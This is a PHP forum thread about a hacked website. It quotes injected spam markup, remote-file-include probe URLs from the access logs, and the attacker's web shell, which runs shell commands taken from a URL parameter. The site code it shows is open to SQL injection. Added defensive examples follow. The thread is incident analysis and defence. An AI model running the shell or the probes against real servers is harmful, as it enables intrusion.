
PHP app hack attack

Posted: Mon May 21, 2007 10:21 am
by kendall
Ok...

I have built a PHP driven website and as of late yesterday I have been attacked...

I have downloaded my index.php file and I am seeing code being inserted into the file

Code:

<!-- o4 --> <LINK REL="StyleSheet" HREF="http://pipka.mcdir.ru/ghuma/ghstyle.css" TYPE="text/css"><!-- c4 --></head>

<body><!-- o4 -->
<a class=prost href="http://xmlpdf.com/photos/search/search.php?q=Acyclovir">Acyclovir</font>, <br></a>
<a class=prost href="http://xmlpdf.com/photos/search/search.php?q=Abilify">Abilify</font>, <br></a>
<a class=prost href="http://xmlpdf.com/photos/search/search.php?q=Amitriptyline">Amitriptyline</font>, <br></a>
<a class=prost href="http://xmlpdf.com/photos/search/search.php?q=Biaxin">Biaxin</font>, <br></a>
<a class=prost href="http://xmlpdf.com/photos/search/search.php?q=[word filtered by forum]">[word filtered by forum]</font>, <br></a>
<a class=prost href="http://xmlpdf.com/photos/search/search.php?q=Diazepam">Diazepam</font>, <br></a>
<a class=prost href="http://xmlpdf.com/photos/search/search.php?q=Femara">Femara</font>, <br></a>
<a class=prost href="http://xmlpdf.com/photos/search/search.php?q=[word filtered by forum]">[word filtered by forum]</font>, <br></a>
<a class=prost href="http://xmlpdf.com/photos/search/search.php?q=Lodine">Lodine</font>, <br></a>
<a class=prost href="http://xmlpdf.com/photos/search/search.php?q=Metformin">Metformin</font>, <br></a>
<a class=prost href="http://xmlpdf.com/photos/search/search.php?q=Nexium">Nexium</font>, <br></a>
<a class=prost href="http://xmlpdf.com/photos/search/search.php?q=Oxycontin">Oxycontin</font>, <br></a>
<a class=prost href="http://xmlpdf.com/photos/search/search.php?q=Plavix">Plavix</font>, <br></a>
<a class=prost href="http://xmlpdf.com/photos/search/search.php?q=[word filtered by forum]">[word filtered by forum]</font>, <br></a>
<a class=prost href="http://xmlpdf.com/photos/search/search.php?q=Seroquel">Seroquel</font>, <br></a>
<a class=prost href="http://xmlpdf.com/photos/search/search.php?q=Tysabri">Tysabri</font>, <br></a>
<a class=prost href="http://xmlpdf.com/photos/search/search.php?q=[word filtered by forum]">[word filtered by forum]</font>, <br></a>
<a class=prost href="http://xmlpdf.com/photos/search/search.php?q=Zocor">Zocor</font>.</a> <!-- c4 -->
So I have my original code in the file, but somewhere along the way the above code is appearing...

What kind of attack is this?
What should I be looking for in my coding that is being used to carry out this attack?
What is recommended to stop it?

Hacker site

Posted: Mon May 21, 2007 11:14 am
by kendall
Just to update you...

http://linuxcmd.netfast.org/test2.txt?&cmd=id

http://www.braskolmat.se/bilder/home.txt??

These were the 2 websites that I had found in my web stats...

I don't understand, though, what the code suggests...

Posted: Mon May 21, 2007 11:35 am
by kendall
/photo_gallery/gallery.php?gid=http://linuxcmd.netfast.org/test2.txt?&cmd=id

was a link to a script that searched a database for a record.... where "gid" is the id of the gallery

I'm not sure how this ties in with him being able to consume my page and replace the code with something else... :?: :?: :? :? 8O
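
The request line quoted above is the sort of thing a log scan can flag on its own. The following PHP script is an added example, not code from this thread or from the poster's site: it reads combined-format access-log lines (constructed here, with the request paths modelled on the two URLs quoted in the thread) and reports any query parameter whose value is itself a URL, and any "cmd" parameter.

```php
<?php
// Added example (not from the original thread). Scans access-log lines for the
// two tell-tale signs seen in this thread: a query parameter whose value is a
// URL (remote-include attempt) and a "cmd" parameter (command passing to a
// dropped web shell). The log lines are constructed for the demo.

$logLines = [
    '203.0.113.5 - - [21/May/2007:09:58:01 +0000] "GET /photo_gallery/gallery.php?gid=12&id=3 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [21/May/2007:10:02:44 +0000] "GET /photo_gallery/gallery.php?gid=http://linuxcmd.netfast.org/test2.txt?&cmd=id HTTP/1.1" 200 812 "-" "libwww-perl/5.805"',
    '198.51.100.7 - - [21/May/2007:10:02:50 +0000] "GET /index.php?pid=http%3A%2F%2Fwww.braskolmat.se%2Fbilder%2Fhome.txt%3F%3F HTTP/1.1" 200 812 "-" "libwww-perl/5.805"',
];

/**
 * Return a list of findings for one log line, or an empty array if it looks clean.
 */
function inspectRequest(string $line): array
{
    // Pull the request target out of the quoted "METHOD /path?query HTTP/x.y" field.
    if (!preg_match('/"(?:GET|POST|HEAD) (\S+) HTTP\/[\d.]+"/', $line, $m)) {
        return [];
    }
    // Split at the first '?' by hand: the attacker's value contains a second '?',
    // which parse_str() would swallow into the previous parameter.
    $qpos = strpos($m[1], '?');
    if ($qpos === false) {
        return [];
    }
    $query = substr($m[1], $qpos + 1);

    $findings = [];
    foreach (explode('&', $query) as $pair) {
        [$name, $value] = array_pad(explode('=', $pair, 2), 2, '');
        $value = rawurldecode($value);       // catch percent-encoded http%3A%2F%2F as well
        if (preg_match('#^(?:https?|ftp)://#i', $value)) {
            $findings[] = "parameter '$name' carries a URL ($value): remote-include attempt";
        }
        if (strcasecmp($name, 'cmd') === 0) {
            $findings[] = "parameter 'cmd' present (value '$value'): command passing to a web shell";
        }
    }
    return $findings;
}

foreach ($logLines as $line) {
    $findings = inspectRequest($line);
    if ($findings) {
        preg_match('/^(\S+)/', $line, $ip);
        echo "ALERT from {$ip[1]}:\n";
        foreach ($findings as $f) {
            echo "  - $f\n";
        }
    }
}
```

Run it from the command line with php; the first (legitimate) line produces nothing, the two modelled on the thread's URLs each produce an alert. Feeding a real log through it is a matter of replacing the constructed array with file() on the access log.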

Posted: Mon May 21, 2007 11:51 am
by RobertGonzalez
Are you hosted with iPowerweb by any chance?

Posted: Mon May 21, 2007 12:00 pm
by kendall
No....what would that have to do with anything?


hahaha...sounds like you're scared dude! :P

Posted: Mon May 21, 2007 12:06 pm
by RobertGonzalez
Nope, I was hosted with them once, and I had several instances where their servers were compromised and hundreds of their clients' sites got hacked similar to yours. They could not ever locate the cause of the breach and their only support assistance was restoring the site files to what they were two days ago.

I have switched to a dedicated server and have not had that problem any more. I asked the question just as a gauge as to whether they have finally figured out how to secure a server or not.

Posted: Mon May 21, 2007 12:54 pm
by kendall

Code:

/*
 * *** By Andi_ ***
 * * smurnoffsrv (at) gmail dot com *
 * * replace dot with "." *
 * * replace (at) with "@" *
 *
*/
//INFO table (pro and normal)
/*if (@file_exists("/usr/X11R6/bin/xterm")) $pro1="<i>xterm</i> at /usr/X11R6/bin/xterm, ";
if (@file_exists("/usr/bin/nc")) $pro2="<i>nc</i> at /usr/bin/nc, ";
if (@file_exists("/usr/bin/wget")) $pro3="<i>wget</i> at /usr/bin/wget, ";
if (@file_exists("/usr/bin/lynx")) $pro4="<i>lynx</i> at /usr/bin/lynx, ";
if (@file_exists("/usr/bin/gcc")) $pro5="<i>gcc</i> at /usr/bin/gcc, ";
if (@file_exists("/usr/bin/cc")) $pro6="<i>cc</i> at /usr/bin/cc ";*/
$safe = @ini_get('safe_mode');
if ($safe) $pro.="<b><i>safe_mode</i>: $safe</b>, "; else $pro.="<b><i>safe_mode</i>: NO</b>, ";
$pro .= "<i>PHP </i>".phpversion();
$login=@posix_getuid(); $euid=@posix_geteuid(); $gid=@posix_getgid();
$ip=@gethostbyname($_SERVER['HTTP_HOST']);
$uname = @posix_uname();

 while (list($info, $value) = each ($uname)) { ?>
<tr><td><b><?=$info ?>:</b> <?=$value;?></td></tr><?php } ?>
<tr><td><b>pro info: ip </b><?="$ip, $pro";?></td></tr>
<?
$pego = $_GET['cmd'];
$out1 = shell_exec($pego);
$out2 = exec($pego);
$out3 = system($pego, $retval);
echo "<pre>$out1</pre>";
echo "<pre>$out2</pre>";
\
This was the code that I found at the sites that I had filtered through my access logs....I'm not sure what it does...as I am failing in trying to reproduce what it does

Posted: Mon May 21, 2007 1:25 pm
by timvw
It executes any shell command you pass via the cmd parameter in the URI...

Posted: Mon May 21, 2007 1:41 pm
by kendall
timvw wrote:It executes any shell command you pass via the cmd parameter in the URI...
If he's trying to do that...then how in the hell is he able to execute them from my site? On my server?

From what the access logs provided, he is passing a URL (this is the URL at which I found that execute script) as a parameter to my app....But the thing is...I am not including the parameter....it's actually going to a SQL statement...thus I'm not doing anything concerning server execute commands

I am however doing a lot of include statements so I'm wondering if that could be the problem

Posted: Mon May 21, 2007 1:51 pm
by timvw
Exploiting remote include is a common flaw (so common that most hosts don't allow remote include anymore)...

My advice: make a backup of your existing site (in case you can't find a recent backup) and take it all offline... Make sure you change all your passwords (including database credentials since it's pretty sure these have been exposed to the attackers)...

Posted: Mon May 21, 2007 2:30 pm
by kendall
timvw wrote: Exploiting remote include is a common flaw (so common that most hosts don't allow remote include anymore)...

Ok, I'm in the process of doing that...

What about my code...I really don't see how he could have gotten into my system....at least from the method he used...

Posted: Mon May 21, 2007 2:47 pm
by timvw
What's this forum for? Post some code so we can have a look at it ;)

My bets are on:
- regular expression matching and it has an 'e' modifier?
- including('...' . $_GET['evil'] . '.php');...
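
The second pattern timvw lists, beside a hardened version of the same include, as an added example that is not code from the thread or from the poster's site. The pages/ directory, the page names in the allow-list, the 'page' parameter name and the 404 handling are assumptions made for the demo.

```php
<?php
// Added example (not from the original thread). The include shape timvw
// describes, next to a hardened one. Directory, page names and parameter
// name are assumed for the demo.

// Vulnerable: the request decides the path. With allow_url_fopen /
// allow_url_include enabled, a URL in ?page= makes PHP fetch and run remote
// code; with them off, "../" still lets the caller pick any local .php file.
function includeUnsafe(string $page): void
{
    include __DIR__ . '/pages/' . $page . '.php';
}

// Hardened: an allow-list decides what can be included, the request only
// selects from it, and the resolved path is checked to lie under pages/.
const ALLOWED_PAGES = ['home', 'gallery', 'contact'];

function includeSafe(string $page): bool
{
    if (!in_array($page, ALLOWED_PAGES, true)) {
        return false;                       // unknown page name: caller serves the 404
    }
    $base = realpath(__DIR__ . '/pages');
    $file = realpath($base . '/' . $page . '.php');
    if ($base === false || $file === false
        || strpos($file, $base . DIRECTORY_SEPARATOR) !== 0) {
        return false;                       // file missing, or resolved outside pages/
    }
    include $file;
    return true;
}

// Belt and braces in php.ini (or php_flag lines in .htaccess where the host allows it):
//   allow_url_include = Off
//   allow_url_fopen   = Off      ; unless the site genuinely opens remote files
//   display_errors    = Off      ; do not hand path details back to the requester

$page = $_GET['page'] ?? 'home';
if (!includeSafe($page)) {
    http_response_code(404);
    echo "404 Not Found\n";
}
```

The allow-list is the part that matters: realpath() plus the prefix check only guards against traversal, so without the list a request could still select any file that happens to sit under pages/.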

Posted: Mon May 21, 2007 2:52 pm
by kendall
Well here is the meat of it really

Code:

<?php
/*
This page will dynamically display the photo index for the gallery
and allow the user to page thru the the gallery one page at a time
*/
require($_SERVER['DOCUMENT_ROOT'].'/Connections/opmConn2.php');
define ("ALBUM_PATH", "http://www.".$_SERVER['HTTP_HOST']."/photo_gallery/"); // base URL for photos
function display_gallerySelect($conn){
	$galleryID = htmlentities($_GET['gid']);
	// Build the HTML for the option select to change the Gallery
	$query_galleryRS = "SELECT * FROM galleries WHERE `Status` = 1 ORDER BY DateID DESC";
	$galleryRS = mysql_query($query_galleryRS, $conn) or die(mysql_error());
	$row_galleryRS = mysql_fetch_assoc($galleryRS);
	
	$selectHTML = "<select name=\"gid\" id=\"gid\">";		//	Initiate the select variable to store the HTML
	
	do {						// Loop thru record set to populate options
		$selectText = "";		// Used to set whether option is selected or not
		$rowGalleryID = $row_galleryRS['GalleryID'];	// Do not overwrite $galleryID (the requested gallery) here, or every option ends up marked selected
		$galleryTitle = $row_galleryRS['Title'];
		if ($rowGalleryID == $galleryID){		//	if the GalleryID column = the current gallery
			$currentGallery = $galleryTitle;						//	set current gallery
			$selectText = "selected";								//	Set selected text for this option
		}
		$selectHTML .= "<option value=\"".$row_galleryRS['GalleryID']."\" ".$selectText.">".$galleryTitle."</option>";
	} while ($row_galleryRS = mysql_fetch_assoc($galleryRS));
	
	$selectHTML .= "</select><input name=\"pid\" type=\"hidden\" value=\"gallery\"> <input type=\"submit\" name=\"submit\" value=\"Go\">";

	return $selectHTML;
} //end display_gallerySelect()

function get_currentGallery($conn){
	$galleryID = htmlentities($_GET['gid']);
	$query_galleryRS = "SELECT * FROM galleries WHERE GalleryID = '$galleryID'";	// stray ")" inside the quotes removed; it made the lookup never match
	$galleryRS = mysql_query($query_galleryRS, $conn) or die(mysql_error());
	$row_galleryRS = mysql_fetch_assoc($galleryRS);
	
	$currentGallery = $row_galleryRS['Title'];
	
	return $currentGallery;
} //end get_currentGallery()

function display_galleryIndex($conn){
	$photosPerRow = 2;
	$colCount = 1;					//Initialize the column count of the row
	$galleryID = htmlentities($_GET['gid']);
	$currentPhoto = "";
	if (isset($_GET['id']))
		$currentPhoto = $_GET['id'];
	$galleryIndexHtml = "";			// Initialize variable to store the the gallery index HTML
	$photoNum=0;					// To match the current photo that in the index
	$imgFile = "";					// To store the path to the current image
	$imgSrcHTML = "";				// Initialize the variable to store the <img src> HTML
	
	$query_photosRS = "SELECT * FROM photos WHERE Gallery = '$galleryID' AND `Status` = 1 ORDER BY PhotoID";
	$photosRS = mysql_query($query_photosRS, $conn) or die(mysql_error());
	$row_photosRS = mysql_fetch_assoc($photosRS);
	$totalPhotos = mysql_num_rows($photosRS);
	$numRows = ceil($totalPhotos/$photosPerRow);
	
	// To highlight Current photo when Gallery first loads
	if ($currentPhoto == "")
		$currentPhoto = $row_photosRS['PhotoID'];

	do {
		$photoID = $row_photosRS['PhotoID'];
		$photoClass = "photoOff";					// Style for Photo Border
		if ($colCount > $photosPerRow){
			$galleryIndexHtml .= "</tr><tr>";		// Break to new row
			$colCount = 1;							// Reset Column Count
		}
		if ($photoID == $currentPhoto){
			$photoClass = "photoOn";
			// === Build HTML for Current Photo
			$imgCaption = $row_photosRS['Caption'];
			$imgFile = "/photo_gallery/".$row_photosRS['Gallery']."/".$photoID."_450.jpg";
			$imgSrcHTML = "<img src=\"".$imgFile."\" width=\"450\" alt=\"".$imgCaption."\" class=\"$photoClass\">";
		
			/* // Image Size
			$imageSize = GetImageSize ($_SERVER['DOCUMENT_ROOT'].$imgFile);
			$imageWidth = $imageSize[0];
			$imageHeight = $imageSize[1];
			$windowWidth = 70+$imageSize[0];
			$windowHeight = 340+$imageHeight; */

		
		}
		$galleryIndexHtml .= sprintf("<td><a href=\"/photo_gallery/gallery.php?gid=$galleryID&id=$photoID\"><img src=\"/photo_gallery/%s/".$photoID."_70.jpg\" width=\"70\" alt=\"".$row_photosRS['Caption']."\" class=\"".$photoClass."\"></a></td>",$galleryID);
		$colCount++;
		$photoNum++;
	
	} while ($row_photosRS = mysql_fetch_assoc($photosRS));
	
	return $galleryIndexHtml;
	
} // end display_galleryIndex() 

function get_imgSrcHTML($conn){
	$currentPhoto = "";
	$galleryID = htmlentities($_GET['gid']);
	$imgPath = "/photo_gallery/$galleryID/";
	
	if (isset($_GET['id']))
		$currentPhoto = $_GET['id'];
	
 	if($currentPhoto != ""){
		$query_currentPhotosRS = sprintf("SELECT * FROM photos WHERE Gallery = '%s' AND PhotoID = '%s' AND `Status` = 1 ORDER BY PhotoID", $galleryID, $currentPhoto);
 	} else {
		$query_currentPhotosRS = sprintf("SELECT * FROM photos WHERE Gallery = '%s' AND `Status` = 1 ORDER BY PhotoID", $galleryID);
	}
			
	$currentPhotosRS = mysql_query($query_currentPhotosRS, $conn) or die(mysql_error());
	$row_currentPhotosRS = mysql_fetch_assoc($currentPhotosRS);
	
	$photoID = $row_currentPhotosRS['PhotoID'];
	global $currentImgCaption;
	$currentImgCaption = $row_currentPhotosRS['Caption'];
	$imgFile = $photoID."_450.jpg";					// To store the path to the current image

	$imgSrcHTML = "<img src=\"".$imgPath.$imgFile."\" width=\"450\" alt=\"".$currentImgCaption."\" class=\"featuresImg\">";
	
	return $imgSrcHTML;
} //end get_imgSrcHTML()


?>
and here is the function which does the file includes

Code:

function get_content(){
	global $menuGroup, $sectionID, $pid, $pageID, $pageTitle, $currentFilePath;
	
	if (strlen($pageID) == 0){
		///echo $pageID = $pid;
		$pageID = $menuGroup."000";
	}
	//echo "mr=".$currentFilePath;
	
	/*//$uri = $_SERVER['REQUEST_URI'];
	$uriSplit = split("/", $uri);
	$filePath = "";
	for ($i=0; $i<count($uriSplit)-1; $i++){
		$filePath .= $uriSplit[$i]."/";
	}*/
	//echo "page id = ".$pageID;
	//$fileExists = False;
	$filePath = get_pagePath();
	$filePath = $currentFilePath;
	//$extension = "html";
	$contentFileHtml = $_SERVER['DOCUMENT_ROOT']."/".$sectionID."/".$pageID.".html";
	$contentFilePhp = $_SERVER['DOCUMENT_ROOT']."/".$sectionID."/".$pageID.".php";
	$contentFile = $contentFileHtml;				// Default assignment for the content file
	if (!file_exists($contentFile))
		$contentFile = $contentFilePhp;				// Set as file with PHP extension
	$defaultPageID = $menuGroup."000";
	$defaultContentFile = $_SERVER['DOCUMENT_ROOT']."/".$sectionID."/".$defaultPageID.".html";
	$pageHead = "<div><img src=\"/images/heading1_".$sectionID.".gif\" ></div>";
	if (isset($_GET['print']) && $_GET['print'] == "1")	{			// Print just the Content
		$pfSectionID = str_replace ("_", " ", $sectionID);
		$pageHead = "<br /><img src=\"/images/heading1_".$sectionID.".gif\" >";
	}
/* 	if (file_exists($contentFile)){
		echo $pageHead;
		include ($contentFile);
	} elseif ((strlen($_SERVER['QUERY_STRING']) == 0 || isset($_GET['print'])) && file_exists($defaultContentFile)){
		echo $pageHead;
		include ($defaultContentFile);
	} else {
		echo $pageHead;
		include ($_SERVER['DOCUMENT_ROOT'].'/includes/404.html');
	}

 */	
 	if (file_exists($contentFileHtml)){
		echo $pageHead;
		include ($contentFileHtml);
	} elseif (file_exists($contentFilePhp)){
		echo $pageHead;
		include ($contentFilePhp);
	} elseif ((strlen($_SERVER['QUERY_STRING']) == 0 || isset($_GET['print'])) && file_exists($defaultContentFile)){
		echo $pageHead;
		include ($defaultContentFile);
	} else {
		echo $pageHead;
		include ($_SERVER['DOCUMENT_ROOT'].'/includes/404.html');
	}

 
 
 	//$fileExists = True;

	//$fileExists = fileExists($pageID, "html");
	//$content = $fileExists;
	
	//return $content;
}
The $pid and the $galleryID are the only variables being sent via $_GET...

I had just put in the htmlentities() function as a temporary thing till I figure out what really is causing the break

Posted: Tue May 22, 2007 11:42 am
by pagedown
Apologies if this is rubbish but...

There is a line

Code:

$currentPhoto = $_GET['id'];
and then $currentPhoto is used here

Code:

$query_currentPhotosRS = sprintf("SELECT * FROM photos WHERE Gallery = '%s' AND PhotoID = '%s' AND `Status` = 1 ORDER BY PhotoID", $galleryID, $currentPhoto);
so part of this line becomes ...

Code:

AND PhotoID = $currentPhoto
but $currentPhoto can be anything the hacker wants can't it? for example "zzz AND <evil code>"

Don't know how that could lead on to what happened to you but it looks like a vulnerability?

Mike
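
An added example, not code from the thread, that shows Mike's point on the exact sprintf() line from the posted gallery.php and then the fix: validate both ids as integers and pass them to the database as bound parameters. It runs against an in-memory SQLite database through PDO so it is self-contained; the photos table layout is assumed from the column names used in the posted code.

```php
<?php
// Added example (not from the original thread). Demonstrates that the
// gallery's sprintf() query splices $_GET['id'] straight into SQL text, and
// shows the hardened form. The table and rows are constructed for the demo.

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE photos (PhotoID INTEGER, Gallery INTEGER, Caption TEXT, Status INTEGER)');
$db->exec("INSERT INTO photos VALUES (1, 7, 'first', 1), (2, 7, 'second', 1), (3, 7, 'hidden', 0)");

// The shape used in the posted gallery.php: whatever ?id= contains becomes SQL.
function vulnerableQuery(string $galleryID, string $currentPhoto): string
{
    return sprintf("SELECT * FROM photos WHERE Gallery = '%s' AND PhotoID = '%s' AND `Status` = 1 ORDER BY PhotoID",
        $galleryID, $currentPhoto);
}

// Hardened: both ids must be integers, and they travel as bound parameters,
// so the database never sees them as part of the statement text.
function fetchPhoto(PDO $db, $galleryID, $currentPhoto): ?array
{
    $gid = filter_var($galleryID, FILTER_VALIDATE_INT);
    $pid = filter_var($currentPhoto, FILTER_VALIDATE_INT);
    if ($gid === false || $pid === false) {
        return null;                        // reject junk outright instead of trying to escape it
    }
    $stmt = $db->prepare('SELECT * FROM photos WHERE Gallery = :gid AND PhotoID = :pid AND Status = 1');
    $stmt->execute([':gid' => $gid, ':pid' => $pid]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Mike's example value: the id is now part of the SQL statement itself.
echo vulnerableQuery('7', 'zzz AND <evil code>'), "\n";

var_dump(fetchPhoto($db, '7', '2'));                      // legitimate id: one row
var_dump(fetchPhoto($db, '7', 'zzz AND <evil code>'));    // rejected before any SQL runs: NULL
var_dump(fetchPhoto($db, '7', '3'));                      // Status = 0 row stays hidden: NULL
```

The same treatment applies to $galleryID: htmlentities(), which the poster added as a stop-gap, only encodes characters that matter to HTML output and leaves the quote and keyword characters that matter to SQL untouched, so it is not a defence for a value that ends up in a query.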

Posted: Tue May 22, 2007 11:48 am
by kendall
Cool, Mike...thanks :)

I'm looking at doing some obfuscation

Jeez, it looks complicated